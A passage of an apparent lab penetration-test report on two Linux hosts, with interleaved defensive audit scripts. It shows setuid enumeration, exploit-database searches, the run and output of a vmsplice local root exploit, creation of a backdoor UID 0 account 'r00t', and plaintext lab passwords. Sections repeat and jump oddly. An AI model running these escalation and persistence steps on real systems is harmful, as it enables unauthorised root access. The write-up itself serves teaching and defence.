User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus,
distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named,
news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm,
shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Username/password: cptvm1/windows, cptvm2/linux
The locations of all files having read and execute permissions set for
other were gathered. This may provide the ability to read data or
execute tasks we normally should not have privileges to.
[cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +003 -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm003_200.txt
The locations of all files that are owned by a group we have access to
and are readable or executable were gathered. This may provide the
ability to read data or execute tasks we normally should not have
privileges to.
[cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +030 -a \( -group cptvm1 -o -group cptvm2 -o -group user \) -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm030-a-groupcptvm1-ogroupcptvm2ogroupuser_200.txt
The locations of all files that are set to execute as the root user were
gathered. This will provide a list of executables that should be
researched for exploits.
[cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +4000 -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm4000_200.txt
The information gathered during this phase was used mainly for exploit
research.
From the information gathered during this step, the systems of interest are
configured as follows:

cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995,
6000, 32768, 32770
TCP services:
  7/tcp      echo
  21/tcp     ftp        vsftpd 1.1.3
  22/tcp     ssh        OpenSSH 3.5p1 (protocol 1.99)
  23/tcp     telnet     Linux telnetd
  79/tcp     finger     Linux fingerd
  80/tcp     http       Apache httpd 2.0.40 (Red Hat Linux)
  109/tcp    POSSIBLY pop2
  110/tcp    pop3       ipopd 2001.78rh
  111/tcp    rpcbind    2 (rpc #100000)
  143/tcp    imap       UW Imapd 2001.315rh
  199/tcp    smux       Linux SNMP multiplexer
  443/tcp    ssl/http   Apache httpd 2.0.40 (Red Hat Linux)
  686/tcp    rquotad    1-2 (rpc #100011)
  993/tcp    imaps
  995/tcp    pop3s
  6000/tcp   X11
  32768/tcp  status     1 (rpc #100024)
  32770/tcp  mountd     1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
  7/udp      echo
  13/udp     daytime
  37/udp     time (32 bits)
  111/udp    rpcbind    2 (rpc #100000)
  123/udp    ntp
  161/udp    snmp       SNMPv1 server (public)
  162/udp    snmptrap
  631/udp    unknown
  683/udp    rquotad    1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm,
gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp,
operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd,
sync, user, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/sbin/suexec,
/sbin/pam_timestamp_check, /usr/bin/passwd, /usr/lib/news/bin/inndstart,
/usr/lib/news/bin/startinnfeed, /usr/lib/news/bin/rnews, /sbin/pwdb_chkpwd,
/sbin/unix_chkpwd, /usr/X11R6/bin/XFree86, /usr/bin/chfn, /usr/bin/chsh,
/usr/bin/newgrp, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper,
/bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/at, /usr/bin/chage,
/usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/sbin/ping6, /usr/sbin/traceroute,
/usr/sbin/traceroute6, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: user/digital, cptvm1/windows, cptvm2/linux

cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
  22/tcp     ssh        OpenSSH 4.3 (protocol 2.0)
  111/tcp    rpcbind    2 (rpc #100000)
  939/tcp    status     1 (rpc #100024)
User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus,
distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named,
news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm,
shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Username/password: cptvm1/windows, cptvm2/linux
ii. cptvm2
Various data was gathered pertaining to the kernel version and
permissions of files within the system. Items of interest were files
having permissions set to run as root, files having permissions
incorrectly set to allow anyone to read/write/execute them and files
owned by one of the accounts with a known password.
Up to this point, the specific version of the Linux kernel was not
known. To gather this information, the uname command was used.
[cptvm1@localhost ~ ]$ uname -a
Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Thu Mar 15 19:57:35 EDT 2007
i686 i686 i386 GNU/Linux
The locations of all files owned by the cptvm1 and cptvm2 accounts
The locations of all files having read and execute permissions set for
other were gathered. This may provide the ability to read data or
execute tasks we normally should not have privileges to.
[cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +003 -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm003_104.txt
The locations of all files that are owned by a group we have access to
and are readable or executable were gathered. This may provide the
ability to read data or execute tasks we normally should not have
privileges to.
[cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +030 -a \( -group cptvm1 -o -group cptvm2 \) -printf "%m %u %g %h/%f\\n" > ~/find-typefa-not-typel-a-perm030-a-groupcptvm1-ogroupcptvm2_104.txt
The locations of all files that are set to execute as the root user were
gathered. This will provide a list of executables that should be
researched for exploits.
[cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +4000 -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm4000_104.txt
The information gathered during this phase was used mainly for exploit
research. However, several files of interest were discovered, namely
the CISngtool (Center for Internet Security, Next Generation scoring
tool - http://www.cisecurity.org).
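The three find commands run on cptvm1 and again on cptvm2 select the same three conditions: `-perm +003` matches any file with the other-write or other-execute bit (a file that is merely world-readable is not selected), `-perm +030 -group ...` matches group-writable or group-executable files owned by a group the account belongs to, and `-perm +4000` matches setuid files. The same audit as a self-contained script, added here as an example and not the report's own tooling: it builds a small constructed tree in a temporary directory (so nothing on the real system is touched), and the group owning that directory stands in for the cptvm1/cptvm2/user groups the report names.

```python
"""Audit a tree for the three permission conditions the report's find
commands select.  Added example, not the report's own script."""
import os
import stat
import tempfile

OTHER_WX = 0o003   # find -perm +003: any of --w, --x for 'other'
GROUP_WX = 0o030   # find -perm +030: any of -w-, --x for group

def audit(root, group_ids):
    """Walk root without following symlinks and return
    {'other_wx': [...], 'group_wx': [...], 'setuid': [...]}, each a list of
    (octal mode, uid, gid, path) tuples like find's '%m %u %g %h/%f'."""
    found = {"other_wx": [], "group_wx": [], "setuid": []}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            # -type f -a -not -type l: regular files only, symlinks skipped.
            if not stat.S_ISREG(st.st_mode):
                continue
            mode = stat.S_IMODE(st.st_mode)
            record = ("%o" % mode, st.st_uid, st.st_gid, path)
            if mode & OTHER_WX:
                found["other_wx"].append(record)
            if mode & GROUP_WX and st.st_gid in group_ids:
                found["group_wx"].append(record)
            if mode & stat.S_ISUID:
                found["setuid"].append(record)
    return found

def build_fixture():
    """Create a constructed tree covering each case; returns its path."""
    root = tempfile.mkdtemp(prefix="permaudit-")

    def make(rel, mode):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(b"constructed sample\n")
        os.chmod(path, mode)
        return path

    make("etc/app/group_writable.conf", 0o664)   # group may write
    make("etc/app/readonly.conf", 0o644)         # other may only read: not selected
    script = make("tmp/world_rwx.sh", 0o777)     # other may write and execute
    make("usr/local/bin/suid_helper", 0o4700)    # setuid, no group/other bits
    os.symlink(script, os.path.join(root, "tmp", "link_to_script"))  # skipped
    os.chmod(os.path.join(root, "tmp"), 0o777)   # a directory: skipped (-type f)
    return root

def demo():
    """Build the fixture, audit it and return {category: sorted file names}."""
    root = build_fixture()
    # The fixture's owning group stands in for the cptvm1/cptvm2/user groups.
    result = audit(root, group_ids={os.lstat(root).st_gid})
    return {k: sorted(os.path.basename(r[3]) for r in v) for k, v in result.items()}

if __name__ == "__main__":
    for category, names in demo().items():
        print(category, names)
```

GNU find has since deprecated the `-perm +mode` form used in the report; `-perm /mode` selects the same files on current findutils.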
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
TCP services:
7/tcp      echo
21/tcp     ftp       vsftpd 1.1.3
22/tcp     ssh       OpenSSH 3.5p1 (protocol 1.99)
23/tcp     telnet    Linux telnetd
79/tcp     finger    Linux fingerd
80/tcp     http      Apache httpd 2.0.40 (Red Hat Linux)
109/tcp    POSSIBLY pop2
110/tcp    pop3      ipopd 2001.78rh
111/tcp    rpcbind   2 (rpc #100000)
143/tcp    imap      UW Imapd 2001.315rh
199/tcp    smux      Linux SNMP multiplexer
443/tcp    ssl/http  Apache httpd 2.0.40 (Red Hat Linux)
686/tcp    rquotad   1-2 (rpc #100011)
993/tcp    imaps
995/tcp    pop3s
6000/tcp   X11
32768/tcp  status    1 (rpc #100024)
32770/tcp  mountd    1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
7/udp      echo
13/udp     daytime
37/udp     time (32 bits)
111/udp    rpcbind   2 (rpc #100000)
123/udp    ntp
161/udp    snmp      SNMPv1 server (public)
162/udp    snmptrap
631/udp    unknown
683/udp    rquotad   1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm,
gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp
operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd
sync, user, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/sbin/suexec,
/sbin/pam_timestamp_check, /usr/bin/passwd, /usr/lib/news/bin/inndstart,
/usr/lib/news/bin/startinnfeed, /usr/lib/news/bin/rnews, /sbin/pwdb_chkpwd,
/sbin/unix_chkpwd, /usr/X11R6/bin/XFree86, /usr/bin/chfn, /usr/bin/chsh,
/usr/bin/newgrp, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper,
/bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/at, /usr/bin/chage,
/usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/sbin/ping6, /usr/sbin/traceroute,
/usr/sbin/traceroute6, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: user/digital, cptvm1/windows, cptvm2/linux
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.18-8
TCP ports: 22, 111, 939
TCP services:
22/tcp     ssh       OpenSSH 4.3 (protocol 2.0)
111/tcp    rpcbind   2 (rpc #100000)
939/tcp    status    1 (rpc #100024)
User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus,
distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named,
news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm,
shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/bin/sudoedit, /media/.hal-mtablock, /usr/sbin/suexec, /usr/bin/Xorg, /usr/bin/chfn, /usr/bin/chsh,
/usr/sbin/userhelper, /usr/lib/squid/ncsa_auth, /usr/lib/squid/pam_auth,
/bin/mount, /bin/ping, /bin/ping6, /bin/su, /bin/umount, /sbin/mount.nfs,
/sbin/mount.nfs4, /sbin/pam_timestamp_check, /sbin/umount.nfs,
/sbin/umount.nfs4, /sbin/unix_chkpwd, /usr/bin/at, /usr/bin/chage,
/usr/bin/gpasswd, /usr/bin/newgrp, /usr/bin/passwd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/kerberos/bin/ksu, /usr/libexec/openssh/sshkeysign, /usr/sbin/ccreds_validate, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: cptvm1/windows, cptvm2/linux
G. Penetration of cptvm1
i. Local exploit research via anyside.org
The list of files designated to execute as root was processed to gain
only the base name of the file. This list would be used to search
against the anyside.org exploit list.
$ awk '{ print "basename ", $4 }' suid_root_200.txt > basename_200.txt
$ chmod +x basename_200.txt
$ ./basename_200.txt | sort -u > basename-2_200.txt
$ cat basename-2_200.txt
XFree86
at
chage
chfn
chsh
crontab
gpasswd
inndstart
lppasswd
mount
newgrp
pam_timestamp_check
passwd
ping
ping6
pwdb_chkpwd
rcp
rlogin
rnews
rsh
ssh-keysign
startinnfeed
su
sudo
suexec
traceroute
traceroute6
umount
unix_chkpwd
userhelper
userisdnctl
usernetctl
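Processing the setuid inventory from the defensive side, as an added example that is not part of the report: a shell script that takes lines in the `%m %u %g %h/%f` format produced by the find commands above, extracts the unique base names (the same list the awk/basename pipeline builds), flags entries that group or other can write to, and diffs the current inventory against an approved baseline. The sample lines, the two non-standard paths (`/usr/local/bin/legacy-helper`, `/tmp/backup`) and the baseline are all constructed for the example.

```shell
# Added example, not from the report. Input format is the report's
# find -printf "%m %u %g %h/%f" output: octal mode, owner, group, path.
# All sample lines are constructed; the last two paths are made up.
SAMPLE_SUID='4755 root root /usr/bin/passwd
4755 root root /bin/ping
4755 root root /usr/sbin/ping6
4775 root root /usr/local/bin/legacy-helper
4777 root root /tmp/backup'

# Unique base names for use as exploit-database search terms, the list the
# report builds with basename(1). Paths containing spaces are not handled
# (the report's awk pipeline does not handle them either).
suid_basenames() {
    awk '{ n = split($4, parts, "/"); print parts[n] }' | LC_ALL=C sort -u
}

# "mode path" for every inventory entry that group or other may write to.
# In an octal mode the write bit is 2, so a digit grants write when
# digit % 4 >= 2 (2, 3, 6 or 7). A writable setuid-root file is a finding
# on its own, regardless of whether any exploit has been published.
suid_loose_perms() {
    awk '{
        m = $1
        g = substr(m, length(m) - 1, 1) % 4
        o = substr(m, length(m), 1) % 4
        if (g >= 2 || o >= 2) print m, $4
    }'
}

# Paths present in the current inventory (stdin) but absent from a
# baseline file ($1) holding one approved setuid path per line.
# FILENAME is compared explicitly so an empty baseline cannot confuse
# the usual NR==FNR idiom.
suid_new_vs_baseline() {
    awk -v b="$1" 'FILENAME == b { base[$0] = 1; next }
                   !($4 in base) { print $4 }' "$1" -
}

# Constructed baseline of the setuid programs expected on the host.
make_baseline() {
    f=$(mktemp)
    printf '%s\n' /usr/bin/passwd /bin/ping /usr/sbin/ping6 > "$f"
    echo "$f"
}

baseline=$(make_baseline)
echo "== base names =="
printf '%s\n' "$SAMPLE_SUID" | suid_basenames
echo "== group/other writable setuid files =="
printf '%s\n' "$SAMPLE_SUID" | suid_loose_perms
echo "== not in baseline =="
printf '%s\n' "$SAMPLE_SUID" | suid_new_vs_baseline "$baseline"
rm -f "$baseline"
```

On a real host the three functions are fed with the saved find output (`suid_basenames < ~/find-typef-a-not-typel-a-perm4000_104.txt`); the baseline would be the inventory taken at build time, so that a new setuid binary shows up as a diff rather than being lost in a 30-entry list.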
The list of exploits used during the remote exploit search was re-used
to search for local exploits on the cptvm1 host.
$ grep exploits\/local exploits_list.txt | grep -w -i -f ../commands/basename-2_200.txt > possible_local_200.txt
$ ll
total 1672
drwxr-xr-x   7 matt matt    238 Feb 21 14:47 ./
drwxr-xr-x  15 matt matt    510 Feb 21 14:47 ../
-rw-r--r--   1 matt matt 126720 Feb  6 14:40 exploits_list.db.tgz
-rw-r--r--   1 matt matt 702666 Sep 21 05:52 exploits_list.txt
-rw-r--r--   1 matt matt   1699 Feb 15 20:34 possible_local_200.txt
-rw-r--r--   1 matt matt   9376 Feb  6 14:43 possible_remote_200.txt
$ cat possible_local_200.txt
2006-07-15;http://www.anyside.org/exp/exploits/local/2006071503.txt;Rocks
Clusters <= 4.1 (mount-loop) Local Root Exploit
2006-07-15;http://www.anyside.org/exp/exploits/local/2006071502.txt;Rocks
Clusters <= 4.1 (umount-loop) Local Root Exploit
2006-03-01;http://www.anyside.org/exp/exploits/local/2006030101.txt;Apple Mac
OS X (/usr/bin/passwd) Custom Passwd Local Root Exploit
2006-01-25;http://www.anyside.org/exp/exploits/local/2006012501.txt;SquirrelMail 3.1
Change Passwd Plugin Local Buffer Overflow Exploit
2005-11-09;http://www.anyside.org/exp/exploits/local/2005110903.txt;FreeBSD
(4.x , < 5.4) master.passwd Disclosure Exploit
2005-11-09;http://www.anyside.org/exp/exploits/local/2005110902.txt;Sudo <=
1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit
2005-11-08;http://www.anyside.org/exp/exploits/local/2005110801.txt;SuSE Linux
<= 9.3, 10 (chfn) Local Root Privilege Escalation Exploit
2005-07-04;http://www.anyside.org/exp/exploits/local/2005070403.txt;Sudo 1.3.1
- 1.6.8p Pathname Validation Local Root Exploit (openbsd)
....;http://www.anyside.org/exp/exploits/local/r57sudo.c;OpenBSD sudo 1.3.1 1.6.8p local root exploit
....;http://www.anyside.org/exp/exploits/local/x_hpux_11i_nls_cu.c;The same
vulnerability to x_hp-ux11i_nls_ct.c,but exploit ping command to get root
shell
2004-9-19;http://www.anyside.org/exp/exploits/local/sudo-exploit.c;sudo
exploit.
2004-9-11;http://www.anyside.org/exp/exploits/local/cdrecordsuidshell.sh.txt;cdrecord $RSH exec() SUID Shell Creation
....;http://www.anyside.org/exp/exploits/local/xlock-XLOCALEDIR.c;Local root
exploit utilizing the overflow in XLOCALEDIR under XFree86 Version 4.2.x using
xlock. Written to work on Redhat 7.2.
The version of sudo fits within the requirements for the Sudo <=
1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit, so it
was downloaded and the code reviewed. Unfortunately, this exploit
relies on an entry within the /etc/sudoers file that points to a file the
user has full access to modify. This situation does not exist on the
cptvm1 host.
The entry listed simply as "sudo exploit." doesn't provide enough
information about its requirements to rule it out. Attempting to
download the exploit resulted in a 404 error from the anyside.org web
site. Without a more detailed description, further research into this
exploit was suspended.
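The condition this exploit depends on, a sudoers entry granting a command that the invoking user can modify, is also a plain configuration weakness worth checking on any host. The following shell script is an added example, not part of the report or of the exploit: it lists sudoers command targets that are missing or writable by group or other. The sudoers content and the helper files it creates are constructed, and the parsing is deliberately simple (the first absolute path in each comma-separated command spec).

```shell
# Added example, not from the report. Audits sudoers command targets for
# files a non-root user could replace. Fixture paths are constructed.

# True (exit 0) when the path is missing or writable by group or other.
# Columns 6 and 9 of the ls -ld permission string are the group and other
# write bits; parsing ls output this way is portable across ls variants.
writable_or_missing() {
    [ -e "$1" ] || return 0
    perms=$(ls -ld "$1" | cut -c1-10)
    case "$perms" in
        ?????w*|????????w?) return 0 ;;
    esac
    return 1
}

# Reads a sudoers-format file ($1) and prints every absolute command path
# that is missing or loosely writable, one per line, in file order.
# Comments and Defaults lines are skipped. For each comma-separated
# command spec the first absolute-path token is taken, which steps over
# tags such as NOPASSWD: and runas specs such as (root); ALL has no path
# and is ignored.
sudoers_risky_targets() {
    sed -e 's/#.*//' "$1" | grep -v '^Defaults' | grep '=' |
    while IFS= read -r line; do
        cmds=${line#*=}
        echo "$cmds" | tr ',' '\n' | while IFS= read -r spec; do
            path=
            for tok in $spec; do
                case "$tok" in /*) path=$tok; break ;; esac
            done
            [ -n "$path" ] || continue
            if writable_or_missing "$path"; then echo "$path"; fi
        done
    done
}

# Builds a constructed fixture: one helper with sane 0755 permissions, one
# world-writable helper, and a sudoers file granting both plus a third
# command that does not exist. Prints the fixture directory.
make_fixture() {
    d=$(mktemp -d)
    printf '#!/bin/sh\n' > "$d/safe-helper";  chmod 0755 "$d/safe-helper"
    printf '#!/bin/sh\n' > "$d/loose-helper"; chmod 0777 "$d/loose-helper"
    cat > "$d/sudoers" <<EOF
# constructed sudoers for the example
Defaults    secure_path="/usr/sbin:/usr/bin:/sbin:/bin"
root        ALL=(ALL) ALL
cptvm1      ALL=(root) NOPASSWD: $d/safe-helper, $d/loose-helper
cptvm1      ALL=(root) $d/missing-helper
EOF
    echo "$d"
}

fixture=$(make_fixture)
echo "== risky sudoers targets =="
sudoers_risky_targets "$fixture/sudoers"
rm -rf "$fixture"
```

Against the real file the call is `sudoers_risky_targets /etc/sudoers` run as root (the file is mode 0440). A missing target is reported as well because a directory the user can write to lets them create the file the rule trusts.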
ii. Local exploit research via secwatch.org
Searches for exploits of at, chage, chfn, chsh, crontab, lppasswd,
mount, newgrp, pam_timestamp_check, passwd, ping, ping6, rcp,
rlogin, rnews, rsh, sudo, suexec, traceroute, umount, unix_chkpwd,
userhelper and xfree86 returned quite a number of results. Most of
the exploits were eliminated due to mismatches on the operating
system or version. The remaining exploits, 24 in total, were
downloaded, reviewed, compiled and tested. It should be noted that
the gcc compiler on the cptvm1 host was named gcc296. To make
things easier, a bin directory was created within the cptvm1 user's
home directory, a symbolic link named gcc was created for gcc296 and
the bin directory was added to the PATH. No successful exploits for
the executables listed above were found.
A search for inndstart provided an interesting exploit. Instead of a
typical buffer overflow exploit, this one is caused by a poorly
planned application feature. An environment variable named INNCONF
can be defined to point to the location of the inn.conf configuration file.
This enables a local user with access to the inndstart program to
create their own inn.conf file with a "pathrun" component pointing to
a directory owned by root and defining a program of their choosing to
be executed as root.
./
../
uselib*
uselib.c
I. Penetration of cptvm2
i. Privilege escalation using a Kernel vmsplice exploit
Since the cptvm1 host fell to a kernel exploit, time was not spent
researching third party applications and system utility exploits on the
cptvm2 host. A search on milw0rm.com for linux kernel 2.6 resulted
in the following exploits.
This left 2 exploits, Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root
Exploit and Linux Kernel 2.6.x chown() Group Ownership Alteration
Exploit. The exploits were taken in order, compiled and executed.
The qaaz, 2008-02-09, Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local
Root Exploit resulted in a shell with root access.
[cptvm1@localhost kernel26_vmsplice]$ ll
total 16
-rw-r--r-- 1 cptvm1 cptvm1 6293 Feb 15 2009 jessica_biel_naked_in_my_bed.c
[cptvm1@localhost kernel26_vmsplice]$ gcc -o jessica_biel_naked_in_my_bed
jessica_biel_naked_in_my_bed.c
[cptvm1@localhost kernel26_vmsplice]$ ll
total 28
-rwxrwxr-x 1 cptvm1 cptvm1 8522 Feb 7 04:05 jessica_biel_naked_in_my_bed
-rw-r--r-- 1 cptvm1 cptvm1 6293 Feb 15 2009 jessica_biel_naked_in_my_bed.c
[cptvm1@localhost kernel26_vmsplice]$ ./jessica_biel_naked_in_my_bed
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f36000 .. 0xb7f68000
[+] root
[root@localhost kernel26_vmsplice]# id
uid=0(root) gid=0(root) groups=500(cptvm1)
[root@localhost kernel26_vmsplice]#
LS_COLORS=no=00:fi=00:di=00;34:ln=00;36:pi=40;33:so=00;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=00;32:*.cmd=00;32:*.exe=00;32:*.com=00;32:*.btm=00;32:*.bat=00;32:*.sh=00;32:*.csh=00;32:*.tar=00;31:*.tgz=00;31:*.arj=00;31:*.taz=00;31:*.lzh=00;31:*.zip=00;31:*.z=00;31:*.Z=00;31:*.gz=00;31:*.bz2=00;31:*.bz=00;31:*.tz=00;31:*.rpm=00;31:*.cpio=00;31:*.jpg=00;35:*.gif=00;35:*.bmp=00;35:*.xbm=00;35:*.xpm=00;35:*.png=00;35:*.tif=00;35:
SSH_AUTH_SOCK=/tmp/ssh-aqCddQ3075/agent.3075
GNOME_KEYRING_SOCKET=/tmp/keyring-euEoqc/socket
USERNAME=cptvm1
SESSION_MANAGER=local/localhost.localdomain:/tmp/.ICE-unix/3075
PATH=/usr/kerberos/sbin:/usr/bin:/usr/sbin:/bin:/sbin:/usr/kerberos/bin:/usr/local/bin:/usr/bin:/bin:/usr/X11R6/bin:/home/cptvm1/bin
DESKTOP_SESSION=default
MAIL=/var/spool/mail/cptvm1
GDM_XSERVER_LOCATION=local
PWD=/home/cptvm1/cpt/exploits/kernel26_vmsplice
INPUTRC=/etc/inputrc
XMODIFIERS=@im=none
LANG=en_US.UTF-8
GDMSESSION=default
SSH_ASKPASS=/usr/libexec/openssh/gnome-ssh-askpass
SHLVL=3
HOME=/home/cptvm1
GNOME_DESKTOP_SESSION_ID=Default
LOGNAME=cptvm1
CVS_RSH=ssh
DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbusyuVqOWjtSW,guid=f9418d49bbcbb5875e2b080cbf709f00
LESSOPEN=|/usr/bin/lesspipe.sh %s
DISPLAY=:0.0
HISTFILE=/dev/null
G_BROKEN_FILENAMES=1
XAUTHORITY=/tmp/.gdmI40NOU
COLORTERM=gnome-terminal
_=/usr/bin/env
[root@localhost kernel26_vmsplice]# useradd -u 0 -o -g 0 -d /root r00t
useradd: warning: the home directory already exists.
Not copying any file from skel directory into it.
[root@localhost kernel26_vmsplice]# passwd r00t
Changing password for user r00t.
New UNIX password:
BAD PASSWORD: it is based on a dictionary word
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
[root@localhost kernel26_vmsplice]#
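Two checks a defender can derive from this section, as an added example that is not taken from the report: a version-range test for the 2.6.17 to 2.6.24.1 range named in the exploit listing, and a scan for extra UID 0 accounts such as the `r00t` user created above. The passwd excerpt is constructed. The range check is a naive numeric comparison, and distribution kernels carrying backported fixes still fall inside the range, so a match is a prompt to verify patch status rather than proof of exposure.

```shell
# Added example, not from the report. Version range and passwd sample are
# constructed from the figures this section gives.

# Returns 0 when a uname -r style string falls inside 2.6.17 .. 2.6.24.1,
# the range the exploit listing names, else 1. Anything after the first
# '-' (e.g. "-8.el5") is dropped; missing components count as 0.
kernel_in_vmsplice_range() {
    v=${1%%-*}
    oldifs=$IFS
    IFS=.
    set -- $v
    IFS=$oldifs
    # Pack major.minor.patch.sub into one integer: 2.6.17 -> 2006017000.
    key=$(( (($1 * 1000 + ${2:-0}) * 1000 + ${3:-0}) * 1000 + ${4:-0} ))
    [ "$key" -ge 2006017000 ] && [ "$key" -le 2006024001 ] && return 0
    return 1
}

# Constructed /etc/passwd excerpt mirroring the "useradd -u 0 -o" step.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
cptvm1:x:500:500::/home/cptvm1:/bin/bash
r00t:x:0:0::/root:/bin/bash'

# Reads passwd-format lines on stdin and prints every account other than
# root whose UID is 0: a second superuser login is a classic persistence
# indicator and should never exist on a stock host.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

if kernel_in_vmsplice_range "$(uname -r)"; then
    echo "running kernel $(uname -r) is inside the listed range"
else
    echo "running kernel $(uname -r) is outside the listed range"
fi
echo "== extra UID 0 accounts in the sample =="
printf '%s\n' "$SAMPLE_PASSWD" | extra_uid0_accounts
```

On a live host the second check is `extra_uid0_accounts < /etc/passwd`; the cptvm2 kernel string from the report, `2.6.18-8`, is inside the range, which is consistent with the exploit succeeding above.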
161/udp    snmp      SNMPv1 server (public)
162/udp    snmptrap
631/udp    unknown
683/udp    rquotad   1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm,
gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp
operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd
sync, user, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/sbin/suexec,
/sbin/pam_timestamp_check, /usr/bin/passwd, /usr/lib/news/bin/inndstart,
/usr/lib/news/bin/startinnfeed, /usr/lib/news/bin/rnews, /sbin/pwdb_chkpwd,
/sbin/unix_chkpwd, /usr/X11R6/bin/XFree86, /usr/bin/chfn, /usr/bin/chsh,
/usr/bin/newgrp, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper,
/bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/at, /usr/bin/chage,
/usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/sbin/ping6, /usr/sbin/traceroute,
/usr/sbin/traceroute6, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: user/digital, cptvm1/windows, cptvm2/linux
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.18-8
TCP ports: 22, 111, 939
TCP services:
22/tcp     ssh       OpenSSH 4.3 (protocol 2.0)
111/tcp    rpcbind   2 (rpc #100000)
939/tcp    status    1 (rpc #100024)
User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus,
distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named,
news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm,
shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
